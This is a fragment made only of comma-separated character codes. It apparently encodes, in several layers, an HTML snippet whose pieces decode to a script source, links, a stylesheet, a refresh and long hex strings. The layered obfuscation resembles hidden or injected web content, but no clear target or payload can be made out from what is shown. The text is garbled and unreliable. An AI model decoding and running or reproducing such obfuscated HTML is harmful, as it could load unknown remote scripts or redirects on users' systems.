,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,49,48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5,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,51,51,37,50,53,50,67,51,53,37,50,53,50,67,51,54,37,50,53,50,67,51,55,37,50,53,50,67,51,56,37,50,53,50,67,52,48,37,50,53,50,67,52,49,37,50,53,50,67,52,50,37,50,53,50,67,49,50,54,37,50,53,50,67,52,51,37,50,53,50,67,52,53,37,50,53,50,67,57,53,37,50,53,50,67,52,54,37,50,53,50,67,52,52,37,50,53,50,67,53,56,37,50,53,50,67,53,57,37,50,53,50,67,54,51,37,50,53,50,67,54,52,37,50,53,50,67,57,49,37,50,53,50,67,52,55,37,50,53,50,67,49,50,52,37,50,53,50,67,57,50,37,50,53,50,67,57,51,37,50,53,50,67,57,52,37,50,53,50,67,57,54,37,50,53,50,67,54,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,57,55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7,37,50,53,50,67,51,57,37,50,53,50,67,53,57,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,52,37,50,53,50,67,54,48,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,54,50,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,52,48,37,50,53,50,67,52,49,37,50,53,50,67,49,50,53,37,50,53,50,67,51,5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53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,57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3,50,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53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7,54,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,57,54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1,52,37,50,53,50,67,51,52,37,50,53,50,67,51,52,37,50,53,50,67,54,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50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51,50,37,50,53,50,67,51,56,37,50,53,50,67,51,53,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,57,37,50,53,50,67,51,50,37,50,53,50,67,51,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,53,48,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,53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49,48,49,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,49,49,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,53,56,37,50,53,50,67,51,50,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,52,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,57,56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48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,52,55,37,50,53,50,67,52,55,37,50,53,50,67,54,48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2,37,50,53,50,67,53,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,53,51,37,50,53,50,67,52,56,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,52,55,37,50,53,50,67,52,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7,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,51,5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5,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57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7,57,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,48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6,37,50,53,50,67,56,48,37,50,53,50,67,56,53,37,50,53,50,67,56,52,37,50,53,50,67,51,50,37,50,53,50,67,56,52,37,50,53,50,67,56,57,37,50,53,50,67,56,48,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,55,51,37,50,53,50,67,55,55,37,50,53,50,67,54,53,37,50,53,50,67,55,49,37,50,53,50,67,54,57,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,54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5,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57,37,50,53,50,67,51,50,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,55,54,37,50,53,50,67,55,57,37,50,53,50,67,54,53,37,50,53,50,67,54,56,37,50,53,50,67,54,49,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,53,51,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,52,57,37,50,53,50,67,53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4,56,37,50,53,50,67,56,57,37,50,53,50,67,55,56,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,53,37,50,53,50,67,52,57,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,53,51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5,54,37,50,53,50,67,55,57,37,50,53,50,67,56,55,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,52,56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5,49,37,50,53,50,67,56,51,37,50,53,50,67,55,57,37,50,53,50,67,56,53,37,50,53,50,67,55,56,37,50,53,50,67,54,56,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,56,50,37,50,53,50,67,54,55,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,57,56,37,50,53,50,67,53,52,37,50,53,50,67,53,55,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,52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6,50,37,50,53,50,67,51,50,37,50,53,50,67,56,51,37,50,53,50,67,55,51,37,50,53,50,67,57,48,37,50,53,50,67,54,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,49,50,53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4,37,50,53,50,67,55,51,37,50,53,50,67,55,56,37,50,53,50,67,55,53,37,50,53,50,67,51,50,37,50,53,50,67,56,50,37,50,53,50,67,54,57,37,50,53,50,67,55,54,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,54,37,50,53,50,67,49,50,49,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,54,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,55,50,37,50,53,50,67,56,50,37,50,53,50,67,54,57,37,50,53,50,67,55,48,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,52,56,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,53,54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7,37,50,53,50,67,49,49,56,37,50,53,50,67,57,56,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,50,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,49,48,48,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,52,57,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,51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49,48,57,37,50,53,50,67,49,49,49,37,50,53,50,67,57,57,37,50,53,50,67,49,48,52,37,50,53,50,67,57,55,37,50,53,50,67,53,56,37,50,53,50,67,57,49,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,52,37,50,53,50,67,57,57,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,55,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,56,37,50,53,50,67,57,57,37,50,53,50,67,57,51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49,48,56,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,57,57,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,53,37,50,53,50,67,49,49,50,37,50,53,50,67,49,49,54,37,50,53,50,67,53,56,37,50,53,50,67,57,49,37,50,53,50,67,53,55,37,50,53,50,67,53,51,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,49,37,50,53,50,67,57,56,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,57,56,37,50,53,50,67,49,48,50,37,50,53,50,67,57,57,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,53,50,37,50,53,50,67,53,53,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,54,37,50,53,50,67,57,51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54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,50,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,53,37,50,53,50,67,49,48,52,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,54,55,37,50,53,50,67,55,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,57,37,50,53,50,67,55,56,37,50,53,50,67,56,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,52,56,37,50,53,50,67,53,57,37,50,53,50,67,49,49,55,37,50,53,50,67,49,49,52,37,50,53,50,67,49,48,56,37,50,53,50,67,54,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,53,53,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,53,50,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,55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3,54,37,50,53,50,67,53,54,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,53,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,49,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,52,56,37,50,53,50,67,53,55,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,57,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,56,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,53,52,37,50,53,50,67,49,48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1,50,37,50,53,50,67,54,54,37,50,53,50,67,54,53,37,50,53,50,67,54,55,37,50,53,50,67,55,53,37,50,53,50,67,55,49,37,50,53,50,67,56,50,37,50,53,50,67,55,57,37,50,53,50,67,56,53,37,50,53,50,67,55,56,37,50,53,50,67,54,56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1,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48,48,37,50,53,50,67,53,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,53,52,37,50,53,50,67,53,53,37,50,